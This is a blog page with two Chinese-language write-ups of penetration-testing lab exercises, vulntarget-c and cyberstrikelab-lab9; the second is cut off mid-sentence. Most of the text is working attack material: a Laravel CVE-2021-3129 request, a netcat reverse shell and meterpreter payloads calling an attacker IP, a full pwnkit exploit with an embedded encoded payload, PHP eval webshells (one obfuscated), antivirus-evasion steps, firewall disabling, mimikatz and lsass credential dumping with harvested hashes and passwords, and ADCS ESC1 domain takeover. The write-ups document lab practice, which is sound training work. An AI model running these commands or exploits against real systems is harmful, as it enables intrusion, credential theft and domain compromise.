搜索到
6
篇与
的结果
-
vulntarget-c 内网靶场渗透实战:从外网到跨网段提权拿下三台主机 前期环境配置在开始渗透测试前,我们需要先调整靶场虚拟机的网络模式,将ubuntu20虚拟机切换为nat模式,确保所有靶场机器和测试主机处于同一内网网段,方便后续的流量通信和操作。第一阶段:外网打点与初始shell获取1、内网活跃主机探测渗透测试的第一步是定位目标所在的活跃主机,我们在测试终端执行arp-scan扫描命令,快速扫描当前局域网内的所有设备:arp-scan -l 执行后我们很快定位到了目标主机的IP地址:10.30.7.55。2、全端口扫描与服务识别接下来我们使用nmap工具对目标主机进行全面的端口和服务扫描,使用半开放扫描模式避免被目标防火墙拦截,同时提速扫描效率:nmap -sS -p- -A 10.30.7.55 -T4 扫描结果显示80端口(HTTP服务)和22端口(SSH服务)处于开放状态,同时我们还获取了目标主机的系统版本、运行的Web框架等基础信息。3、漏洞信息收集通过扫描结果我们确认目标运行的是Laravel Web框架,结合公开的漏洞库信息,该版本的Laravel存在CVE-2021-3129远程代码执行漏洞,该漏洞可以通过特定的接口请求实现未授权的代码执行。4、漏洞验证与利用该漏洞的触发条件是向/_ignition/execute-solution接口发送恶意POST请求,当页面返回500状态码且出现file_get_contents相关错误时,即可确认漏洞存在。我们构造了如下的HTTP请求包:文章参考:laravel RCE(cve-2021-3129)复现 - Running_J - 博客园POST /_ignition/execute-solution HTTP/1.1 Host: 10.30.7.55 Content-Type: application/json Content-Length: 168 { "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": { "variableName": "jack", "viewFile": "jack1" } } 5、获取反向shell我们可以使用公开的exp脚本进行快速利用expcuongtop4598/CVE-2021-3129-Script: Add revert shell首先需要根据目标系统的架构调整脚本内容修改源码,uname -a判断为系统类型为x64,并且wget命令存在首先我们生成针对linux x64架构的反弹shell木马:msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=10.30.7.128 lport=4444 -f elf > shell.elf 其中lhost是我们的本地监听IP,lport是自定义的监听端口。为了让目标主机可以下载我们生成的木马我们在本地开启了简易的HTTP文件共享服务,将当前目录作为共享目录。之后我们在目标主机执行修改后的下载命令,将木马文件下载到本地临时目录。接下来我们执行反弹shell命令,建立和本地监听终端的连接:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.30.7.128 4444 >/tmp/f 继续修改文件,分别写入如下命令,依次执行chmod +x /tmp/shell.elf /tmp/shell.elf 执行之前,新开一个终端,打开msfmsfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST 10.30.7.128; set LPORT 4444; exploit -j -z" 上线之后能看到第二个网卡为10.0.20.1416、权限提升成功拿到低权限shell后,我们需要进一步提升权限获取root访问权限。首先我们上传linpeas.sh脚本到目标主机,该脚本可以自动扫描主机上的潜在漏洞和配置错误:upload linpeas.sh shell python3 -c 'import pty;pty.spawn("/bin/bash")' chmod +x linpeas.sh ./linpeas.sh 扫描结果显示目标主机存在CVE-2021-4034(pwnkit)漏洞,这是一个pkexec的本地权限提升漏洞,可以让普通用户获取root权限。我们使用公开的poc脚本进行提权:#!/usr/bin/env python3 # poc for https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt found by qualys # hardcoded amd64 lib from ctypes import * from ctypes.util import find_library import os import zlib import base64 import tempfile payload = zlib.decompress( base64.b64decode( """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""" ) ) libc = CDLL(find_library("c")) libc.execve.argtypes = c_char_p, POINTER(c_char_p), POINTER(c_char_p) libc.execve.restype = c_ssize_t wd = tempfile.mkdtemp() open(wd + "/pwn.so", "wb").write(payload) os.mkdir(wd + "/gconv/") open(wd + "/gconv/gconv-modules", "w").write( "module UTF-8// INTERNAL ../pwn 2" ) os.mkdir(wd + "/GCONV_PATH=.") os.mknod(wd + "/GCONV_PATH=./gconv") os.chmod(wd + "/GCONV_PATH=.", 0o777) os.chmod(wd + "/GCONV_PATH=./gconv", 0o777) os.chmod(wd + "/pwn.so", 0o777) os.chdir(wd) cmd = b"/usr/bin/pkexec" argv = [] envp = [ b"gconv", b"PATH=GCONV_PATH=.", b"LC_MESSAGES=en_US.UTF-8", b"XAUTHORITY=../gconv", b"", ] cargv = (c_char_p * (len(argv) + 1))(*argv, None) cenv = (c_char_p * (len(envp) + 1))(*envp, None) libc.execve(cmd, cargv, cenv) 执行该脚本后我们成功获取到了root权限,同时发现目标主机存在第二块网卡,IP地址为10.0.20.141,说明目标主机处于另一个内网网段,需要进行横向移动渗透。第二阶段:内网横向移动渗透1、配置路由与网段扫描我们需要将msf的流量转发到新发现的10.0.20.0/24网段,以便扫描该网段内的其他主机。首先我们配置路由规则,将该网段的流量通过当前的shell会话转发。接下来我们使用msf的端口扫描模块扫描该网段内的活跃主机:ping内网主机发现,仅仅显示本机的第二张网卡ipfor i in {1..254}; do (ping -c 1 10.0.20.${i} | grep "bytes from" | grep -v "Unreachable" &); done; tcp扫描,发现内网主机ip10.0.20.100,说明目标机器禁了ping或者开启了防火墙use auxiliary/scanner/portscan/tcp set RHOSTS 10.0.20.0/24 set PORTS 22,80,135,139,445 run 2、访问Web后台与漏洞发现我们访问10.0.20.100的80端口,发现是一个企业内部的后台管理系统尝试使用常见的弱口令组合admin/admin123成功登录后台管理界面。在service list中的编辑按钮,能找到数据包,对其进行sql注入检测,发现其可能存在sql注入漏洞并且站点跟目录为\xampp\htdocs\ovas\3、SQL注入获取webshell我们使用sqlmap工具对该注入点进行检测,首先确认当前数据库用户权限:sqlmap -u "http://10.0.20.100/admin/services/manage_service.php?id=5" --cookie "PHPSESSID=kij7i7jvpiq97lgf8r98cociip" --current-user 尝试直接获取webshell,发现是系统权限sqlmap -u "http://10.0.20.100/admin/services/manage_service.php?id=5" --cookie "PHPSESSID=kij7i7jvpiq97lgf8r98cociip" --os-shell 成功获取到了windows主机的系统权限shell,我们查看系统架构确认是64位系统,systeminfo 接下来生成对应的反弹shell木马:msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -f exe -o shell.exe 传马到第一台机器中开启文件共享4、免杀木马与上线我们将生成的木马文件上传到目标主机的web目录下,尝试使用certutil命令下载并执行:windows机器从这台linux中下载文件certutil -urlcache -split -f http://10.0.20.141:8000/shell.exe shell.exe 准备上线上线失败,被杀加免杀,生成shellcodemsfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -f c --encrypt base64 替换shellcode打包pyinstaller -F -w Bypass_AV.py 继续上传此时没有被杀,但是没有上线,大概率防火墙没关关闭防火墙netsh advfirewall set allprofiles state off 正常上线第三阶段:拿下第三台靶场主机1、内网信息收集与网段扫描成功获取windows主机权限后,我们进行内网信息收集,发现该主机处于工作组环境,没有域控制器。接下来我们扫描10.0.10.0/24网段,发现10.0.10.110主机仅开放22端口,大概率是linux服务器。发现另一个网段机器内网信息收集,发现并没有域环境,是一个工作组ping主机探测,发现内网第三台服务器,通过ttl为64可以看出目标机器大概率是linux服务器for /l %i in (1,1,255) do @ping 10.0.10.%i -w 1 -n 1 | find /i "ttl" msf添加路由run post/multi/manage/autoroute 端口扫描,仅开放22端口use auxiliary/scanner/portscan/tcp set RHOSTS 10.0.10.110 set PORTS 22,80,135,139,445 run 2、爆破登录与凭据获取我们尝试使用之前获取的凭据登录该linux主机,但是全部失败。于是我们使用hydra工具进行弱口令爆破,最终得到登录密码Admin#123,成功登录该主机。抓取系统hashload kiwi creds_all 修改注册表reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f 再次抓取,也失败creds_all 离线导出procdump.exe -accepteula -ma lsass.exe demo.dmp 开启http服务传到本地,使用本地的mimikatz加载明文密码使用mimikatz抓取明文密码,发现系统并没有保存密码在这个文件中,原因就是系统没有本地登录或者远程登录过,所以无法获取用户登录的凭据mimikatz.exe sekurlsa::minidump demo.dmp sekurlsa::logonpasswords full 直接爆破得到密码Admin#123 开启远程服务C:\xampp\htdocs\ovas\admin\services>netsh advfirewall firewall add rule name="Remote Desktop TCP" dir=in action=allow protocol=TCP localport=3389 netsh advfirewall firewall add rule name="Remote Desktop TCP" dir=in action=allow protocol=TCP localport=3389 Ok. C:\xampp\htdocs\ovas\admin\services>reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f The operation completed successfully. 使用默认的远程连接工具连接不上,rdesktop 不支持 CredSSP使用下面这个工具xfreerdp /u:Administrator /v:10.0.20.100 /cert:ignore 3、获取最终权限我们在windows主机的远程连接工具中发现了该linux主机的另一个用户凭据,密码为vuln@qwe,使用该密码我们成功登录并获取了该主机的最高权限,拿下了最后一台靶场机器。在文件管理中发现了这个远程连接工具查看旁边的10.0.10.110直接双击就能远程连接在linux中找了大半天信息,没有任何东西,直到在这个工具中发现这个用户的密码vuln@qwe拿下最后一台机器 -
【域渗透】cyberstrikelab-lab9 cyberstrikelab-lab9第一台web 172.5.33.6sql的payloadhttp://172.5.33.6/?case=crossall&act=execsql&sql=Ud-ZGLMFKBOhqavNJNK5WRCu9igJtYN1rVCO8hMFRM8NIKe6qmhRfWexXUiOqRN4aCe9aUie4Rtw5 a66abb5684c45962d887564f08346e8d 解密 admin123456从robots.txt中发现admin地址,登录管理员账号在这里发现了html模板中包含了php代码在模板管理中修改index.html<?php @eval($_POST['a']);?> 一句话还是连不上的,尝试另一种马,好像也没有其他方法能打进去了,网上找了十多种写法的马,就这种有效<?php function simpleTransform($str, $offset = 1) { $transformed = ''; for ($i = 0; $i < strlen($str); $i++) { $transformed .= chr((ord($str[$i]) + $offset) % 256); } return $transformed; } $original = $_REQUEST["a"]; $transformed = simpleTransform($original, 3); function reverseTransform($str, $offset = 1) { $reversed = ''; for ($i = 0; $i < strlen($str); $i++) { $reversed .= chr((ord($str[$i]) - $offset + 256) % 256); } return $reversed; } $reversed = reverseTransform($transformed, 3); echo eval($reversed); 蚁剑连接生马msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=10.10.10.173 LPORT=4444 -f exe -o shell.exe 上线msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/bind_tcp; set RHOST 172.5.33.6; set LPORT 4444; exploit -j -z" 提权,上传fscanmeterpreter > getuid Server username: NT AUTHORITY\NETWORK SERVICE meterpreter > getsystem ...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > upload /data/CS/Cobalt_Strike_4.7/plugin/TaoWu/script/x64/fscan.exe 查ip,扫内网C:\phpstudy_pro\WWW>ipconfig ipconfig Windows IP Configuration Ethernet adapter ��̫��ʵ�� 1: Connection-specific DNS Suffix . : Link-local IPv6 Address . . . . . : fe80::3f:d815:5529:b836%11 IPv4 Address. . . . . . . . . . . : 172.5.33.6 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 172.5.33.233 Ethernet adapter ��̫��ʵ�� 2: Connection-specific DNS Suffix . : Link-local IPv6 Address . . . . . : fe80::c133:dd94:56a9:bdcc%2 IPv4 Address. . . . . . . . . . . : 10.6.6.10 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 10.6.6.1 Tunnel adapter isatap.{730545FA-7DC0-4716-8AF2-678FFC6D1F1C}: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : Tunnel adapter isatap.{E6E2FD25-6949-4C86-A749-7F0F14616295}: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : C:\phpstudy_pro\WWW>fscan.exe -h 10.6.6.10/24 fscan.exe -h 10.6.6.10/24 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.1 start infoscan (icmp) Target 10.6.6.10 is alive (icmp) Target 10.6.6.55 is alive (icmp) Target 10.6.6.88 is alive [*] Icmp alive hosts len is: 3 10.6.6.55:88 open 10.6.6.10:3306 open 10.6.6.88:445 open 10.6.6.55:445 open 10.6.6.10:445 open 10.6.6.88:139 open 10.6.6.55:139 open 10.6.6.10:139 open 10.6.6.88:135 open 10.6.6.55:135 open 10.6.6.10:135 open 10.6.6.55:80 open 10.6.6.10:80 open [*] alive ports len is: 13 start vulscan [+] NetInfo: [*]10.6.6.10 [->]WIN-784BAKDI0AC [->]172.5.33.6 [->]10.6.6.10 [+] NetInfo: [*]10.6.6.55 [->]DC [->]10.6.6.55 [+] NetInfo: [*]10.6.6.88 [->]cyberweb [->]10.6.6.88 [*] WebTitle:http://10.6.6.10 code:200 len:0 title:None [*] 10.6.6.55 [+]DC __MSBROWSE__\DC Windows Server 2016 Standard 14393 [*] 10.6.6.88 CYBERSTRIKELAB\CYBERWEB Windows Server 2016 Standard 14393 [*] 10.6.6.88 (Windows Server 2016 Standard 14393) [*] 10.6.6.55 (Windows Server 2016 Standard 14393) [*] WebTitle:http://10.6.6.55 code:200 len:703 title:IIS Windows Server [+] http://10.6.6.55 poc-yaml-active-directory-certsrv-detect 已完成 13/13 [*] 扫描结束,耗时: 1m8.3819491s 其中10.6.6.55被识别为域控制器10.6.6.88是域成员,主机名cyberweb,属于域CYBERSTRIKELAB10.6.6.55: 报告了一个漏洞 poc-yaml-active-directory-certsrv-detect。这强烈暗示该服务器上运行着 Active Directory 证书服务 (AD CS),是后续攻击的关键入口。设置路由,配置代理meterpreter > run post/multi/manage/autoroute [*] Running module against WIN-784BAKDI0AC (172.5.33.6) [*] Searching for subnets to autoroute. [+] Route added to subnet 10.6.6.0/255.255.255.0 from host's routing table. [+] Route added to subnet 172.5.33.0/255.255.255.0 from host's routing table. meterpreter > bg [*] Backgrounding session 2... msf exploit(multi/handler) > use auxiliary/server/socks_proxy msf auxiliary(server/socks_proxy) > set VERSION 5 VERSION => 5 msf auxiliary(server/socks_proxy) > set SRVPORT 1080 SRVPORT => 1080 msf auxiliary(server/socks_proxy) > run -j [*] Auxiliary module running as background job 1. [*] Starting the SOCKS proxy server 配置系统代理配置文件proxychains4.conf┌──(root㉿kali)-[/data/windows_atk/domain_atk] └─# tail -n \6 /etc/proxychains4.conf [ProxyList] # add proxy here ... # meanwile # defaults set to "tor" socks5 127.0.0.1 1080 第二台fscan定向扫描,端口,发现3389能进行爆破,administrator密码为qwe123!@#C:\phpstudy_pro\WWW>fscan.exe -h 10.6.6.88 -p 1-10000 fscan.exe -h 10.6.6.88 -p 1-10000 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.1 start infoscan (icmp) Target 10.6.6.88 is alive [*] Icmp alive hosts len is: 1 10.6.6.88:445 open 10.6.6.88:139 open 10.6.6.88:135 open 10.6.6.88:3389 open 10.6.6.88:5985 open [*] alive ports len is: 5 start vulscan [+] NetInfo: [*]10.6.6.88 [->]cyberweb [->]10.6.6.88 [*] 10.6.6.88 (Windows Server 2016 Standard 14393) [*] WebTitle:http://10.6.6.88:5985 code:404 len:315 title:Not Found [*] 10.6.6.88 CYBERSTRIKELAB\CYBERWEB Windows Server 2016 Standard 14393 已完成 3/5 [-] (18/210) rdp 10.6.6.88:3389 administrator administrator1 remote error: tls: access denied 已完成 4/5 [-] (36/210) rdp 10.6.6.88:3389 administrator 123456789 remote error: tls: access denied 已完成 4/5 [-] (54/210) rdp 10.6.6.88:3389 administrator Aa12345 remote error: tls: access denied [+] RDP:10.6.6.88:3389:administrator qwe123!@# 已完成 5/5 [*] 扫描结束,耗时: 4m8.7461024s 在桌面找到第二个flag第三台看样子需要利用域控相关的漏洞了,永恒之蓝失败use exploit/multi/handler set rhost 10.6.6.88 run 共享data目录(便于传输文件),然后将正向马传上去,并执行proxychains rdesktop 10.6.6.88 -r disk:shell=/data 提权meterpreter > getuid Server username: CYBERWEB\Administrator meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM 抓取域内hashC:\Users\Administrator\Desktop>mimikatz.exe mimikatz # privilege::debug mimikatz # sekurlsa::logonpasswords User Name : CYBERWEB$ Domain : CYBERSTRIKELAB NTLM : 5e0d5d7bacf2087dfd44ea47812b5165 User Name : CYBERWEB$ Domain : CYBERSTRIKELAB NTLM : 331dcbb88d1a4847c97eab7c1c168ac8 User Name : Administrator Domain : CYBERWEB NTLM : c377ba8a4dd52401bc404dbe49771bbc 在这个3.bat文件中发现了一个账号密码,cslab / cs1ab@wwe第三台:ADCSADCS是横向移动到域控制器的常见路径3.1 侦察ADCS服务之前fscan扫出来的[+] http://10.6.6.55 poc-yaml-active-directory-certsrv-detect 表明可能存在AD证书服务再次上线getsystem,获取一个系统权限的cmd,获取一下CA名字(需要提权到system),执行 certutil名称为 cyberstrikelab-DC-CA获取到CA名称后,我们需要确定攻击入口,并且寻找可利用的漏洞,比如ESC1漏洞┌──(root㉿kali)-[/data/demo] └─# proxychains certipy-ad find -u 'cslab@10.6.6.55' -password 'cs1ab@wwe' -dc-ip 10.6.6.55 -vulnerable -stdout [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 Certipy v5.0.3 - by Oliver Lyak (ly4k) [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.6.6.55:636 ... OK [*] Finding certificate templates [*] Found 34 certificate templates [*] Finding certificate authorities [*] Found 1 certificate authority [*] Found 12 enabled certificate templates [*] Finding issuance policies [*] Found 15 issuance policies [*] Found 0 OIDs linked to templates [!] DNS resolution failed: The resolution lifetime expired after 5.403 seconds: Server Do53:10.6.6.55@53 answered The DNS operation timed out.; Server Do53:10.6.6.55@53 answered The DNS operation timed out.; Server Do53:10.6.6.55@53 answered The DNS operation timed out. [!] Use -debug to print a stacktrace [*] Retrieving CA configuration for 'cyberstrikelab-DC-CA' via RRP [proxychains] Strict chain ... 127.0.0.1:1080 ... DC.cyberstrikelab.com:445 <--socket error or timeout! [-] Failed to connect to remote registry: [Errno Connection error (224.0.0.1:445)] [Errno 111] Connection refused [-] Use -debug to print a stacktrace [!] Failed to get CA configuration for 'cyberstrikelab-DC-CA' via RRP: 'NoneType' object has no attribute 'request' [!] Use -debug to print a stacktrace [!] Could not retrieve configuration for 'cyberstrikelab-DC-CA' [*] Checking web enrollment for CA 'cyberstrikelab-DC-CA' @ 'DC.cyberstrikelab.com' [proxychains] Strict chain ... 127.0.0.1:1080 ... DC.cyberstrikelab.com:80 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... DC.cyberstrikelab.com:443 ... OK [*] Enumeration output: Certificate Authorities 0 CA Name : cyberstrikelab-DC-CA DNS Name : DC.cyberstrikelab.com Certificate Subject : CN=cyberstrikelab-DC-CA, DC=cyberstrikelab, DC=com Certificate Serial Number : 652A47597C7F03824B7815EBE474E40B Certificate Validity Start : 2025-04-22 07:45:38+00:00 Certificate Validity End : 2030-04-22 07:55:38+00:00 Web Enrollment HTTP Enabled : False HTTPS Enabled : False User Specified SAN : Unknown Request Disposition : Unknown Enforce Encryption for Requests : Unknown Active Policy : Unknown Disabled Extensions : Unknown Certificate Templates 0 Template Name : DC Display Name : DC Certificate Authorities : cyberstrikelab-DC-CA Enabled : True Client Authentication : True Enrollment Agent : False Any Purpose : False Enrollee Supplies Subject : True Certificate Name Flag : EnrolleeSuppliesSubject Extended Key Usage : Client Authentication Requires Manager Approval : False Requires Key Archival : False Authorized Signatures Required : 0 Schema Version : 2 Validity Period : 1 year Renewal Period : 6 weeks Minimum RSA Key Length : 2048 Template Created : 2025-04-22T07:58:11+00:00 Template Last Modified : 2025-04-22T07:58:11+00:00 Permissions Enrollment Permissions Enrollment Rights : CYBERSTRIKELAB.COM\Domain Users CYBERSTRIKELAB.COM\Domain Admins CYBERSTRIKELAB.COM\Domain Computers CYBERSTRIKELAB.COM\Enterprise Admins CYBERSTRIKELAB.COM\Authenticated Users Object Control Permissions Owner : CYBERSTRIKELAB.COM\Administrator Full Control Principals : CYBERSTRIKELAB.COM\Domain Admins CYBERSTRIKELAB.COM\Enterprise Admins Write Owner Principals : CYBERSTRIKELAB.COM\Domain Admins CYBERSTRIKELAB.COM\Enterprise Admins Write Dacl Principals : CYBERSTRIKELAB.COM\Domain Admins CYBERSTRIKELAB.COM\Enterprise Admins Write Property Enroll : CYBERSTRIKELAB.COM\Domain Admins CYBERSTRIKELAB.COM\Domain Computers CYBERSTRIKELAB.COM\Enterprise Admins [+] User Enrollable Principals : CYBERSTRIKELAB.COM\Authenticated Users CYBERSTRIKELAB.COM\Domain Computers CYBERSTRIKELAB.COM\Domain Users [!] Vulnerabilities ESC1 : Enrollee supplies subject and template allows client authentication. 参数来源/原因作用proxychains之前建立的代理配置让命令流量通过跳板机(10.6.6.10)进入内网certipy-ad工具选择专门用于AD证书服务攻击的工具find子命令查找证书模板和证书颁发机构(CA)-u 'cslab@10.6.6.55'从mimikatz获得使用域用户cslab,@后可以是IP或域名-password 'cs1ab@wwe'从mimikatz/3.bat获得cslab用户的密码-dc-ip 10.6.6.55fscan扫描结果指定域控制器的IP地址-vulnerable攻击目标只显示存在已知漏洞的证书模板-stdout输出选项将结果输出到终端从结果中看出,存在ESC1漏洞Template Name: DC Enabled: True Client Authentication: True Enrollee Supplies Subject: True # ESC1漏洞关键点 Enrollment Rights: CYBERSTRIKELAB.COM\Domain Users # cslab可申请 Vulnerabilities: ESC1 3.2 利用ESC1漏洞3.2.1 创建机器账户(临时)利用cslab这个域用户在目标域中创建一个新的机器账户,结果会返回一个临时用户tmpuser$和密码信息proxychains certipy-ad -debug account create -u 'cslab@cyberstrikelab.com' -p 'cs1ab@wwe' -dc-ip 10.6.6.55 -user tmpuser -dns DC.cyberstrikelab.com 参数来源/原因作用account create子命令在域中创建新的机器账户-user tmpuser自定义创建名为tmpuser$的机器账户-dns DC.cyberstrikelab.com从fscan结果获得设置机器账户的DNS主机名为什么要创建?Machine模板限制:有些证书模板(如Machine)只允许机器账户申请 隐蔽性:避免直接使用cslab账户进行敏感操作 权限要求:机器账户可以申请更广泛的证书类型 3.2.2 以机器账户请求证书通过新创建的机器账户 tmpuser$ 向目标域控制器(10.6.6.55)的证书颁发机构(CA)申请一个 机器证书(要多运行几次,运行一次可能成功不了)proxychains certipy-ad req \ -u 'tmpuser$@cyberstrikelab.com' \ -p 'kQb8YIJOWcKq69w5' \ -ca 'cyberstrikelab-DC-CA' \ -target 10.6.6.55 \ -template 'Machine' \ -dc-ip 10.6.6.55 参数来源/原因作用req子命令请求证书-u 'tmpuser$@...'上一步创建使用新创建的机器账户-p 'kQb8YIJOWcKq69w5'上一步输出机器账户的密码-ca 'cyberstrikelab-DC-CA'certipy find结果证书颁发机构的名称-target 10.6.6.55fscan扫描结果CA服务器的IP地址-template 'Machine'侦察发现利用存在漏洞的模板用dc.pfx 证书文件向域控制器 (10.6.6.55) 进行身份认证,却报了Kerberos时钟偏差,攻击机和域控时间是不能相差5分钟以上的┌──(root㉿kali)-[/data/demo] └─# proxychains certipy-ad auth -pfx dc.pfx -dc-ip 10.6.6.55 [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 Certipy v5.0.3 - by Oliver Lyak (ly4k) [*] Certificate identities: [*] SAN DNS Host Name: 'DC.cyberstrikelab.com' [*] Using principal: 'dc$@cyberstrikelab.com' [*] Trying to get TGT... [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.6.6.55:88 ... OK [-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great) [-] Use -debug to print a stacktrace [-] See the wiki for more information 3.2.3 修复Kerberos时间偏差查询域控时间proxychains net time -S 10.6.6.55 3.2.4 使用证书进行身份验证修改时间参数,这样就能执行成功了┌──(root㉿kali)-[/data/demo] └─# faketime '2025-12-11 22:57:01' proxychains certipy-ad -debug auth -pfx dc.pfx -dc-ip 10.6.6.55 [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 Certipy v5.0.3 - by Oliver Lyak (ly4k) [+] Target name (-target) and DC host (-dc-host) not specified. Using domain '' as target name. This might fail for cross-realm operations [+] Nameserver: '10.6.6.55' [+] DC IP: '10.6.6.55' [+] DC Host: '' [+] Target IP: '10.6.6.55' [+] Remote Name: '10.6.6.55' [+] Domain: '' [+] Username: '' [*] Certificate identities: [*] SAN DNS Host Name: 'DC.cyberstrikelab.com' [*] Using principal: 'dc$@cyberstrikelab.com' [*] Trying to get TGT... [+] Sending AS-REQ to KDC cyberstrikelab.com (10.6.6.55) [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.6.6.55:88 ... OK [*] Got TGT [*] Saving credential cache to 'dc.ccache' [+] Attempting to write data to 'dc.ccache' [+] Data written to 'dc.ccache' [*] Wrote credential cache to 